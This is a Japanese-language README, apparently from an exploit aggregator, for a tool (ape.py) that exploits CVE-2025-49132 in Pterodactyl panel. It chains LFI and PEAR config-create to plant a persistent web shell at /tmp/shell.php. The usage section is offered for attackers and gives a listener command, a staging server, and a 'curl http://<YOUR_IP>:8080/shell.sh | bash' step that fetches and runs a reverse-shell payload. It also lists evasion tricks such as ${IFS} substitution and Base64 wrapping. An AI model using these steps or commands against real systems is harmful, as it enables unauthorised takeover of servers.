## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MALW0RE-CVE-2025-49132-MODS
# CVE-2025-49132 - RCE シンプル
 
## 📝 概要
このリポジトリには、Pterodactyl パネル(v1.11.11 より前)における重大な未認証のリモートコード実行(RCE)脆弱性である CVE-2025-49132 用の専用エクスプロイトが含まれています。
この脆弱性は /locales/locale.json エンドポイントに存在します。locale および namespace クエリパラメータを操作することで、攻撃者は Local File Inclusion(LFI)を利用して pearcmd.php とやり取りできます。これにより、任意のファイル作成とコマンド実行が可能になり、システム全体が侵害されます。
## ⚙️ エクスプロイトチェーン
ape.py スクリプトは以下の手順を自動化します:
PEAR ディスカバリ:対象のディレクトリ構造をファジングして、PEAR のインストール場所を特定します。
バックドア作成:PEAR の config-create を使用して、永続的な Web シェルを /tmp/shell.php に書き込みます。
## 🚀 使用方法
ターゲット上でコールバックを成功させるには、次のワークフローに従ってください:
1. 準備 リスナー:別のターミナルで Penelope(またはお好みのリスナー)を起動します:
`penelope -p 4444`
ステージングサーバー:カスタムシェルスクリプトを使用する場合は、Python でホストします: `python3 -m http.server 8080`
2. 実行 インタラクティブモードでスクリプトを実行し、エクスプロイト処理の制御を維持します:
`python3 ape.py --host xxx.xxx.xxx --interactive`
3. シェルの取得 shell> プロンプト内で、次のコマンドを使用してステージングしたペイロードを実行します:
`shell> curl http://<YOUR_IP>:8080/shell.sh | bash`
## 🛡️ 技術的保護対策
スペース回避:自動的に ${IFS} を使用して、ペイロードが URL 解析を生き残るようにします。
Base64 ラッパー:リバースシェルコマンドを Base64 でラップして、対象の Nginx/Web サーバーによる文字化けを防ぎます。
タイムアウト処理:Web リクエストがハングした場合でも、リバースシェルが正常に接続されたことを検出するように設計されています。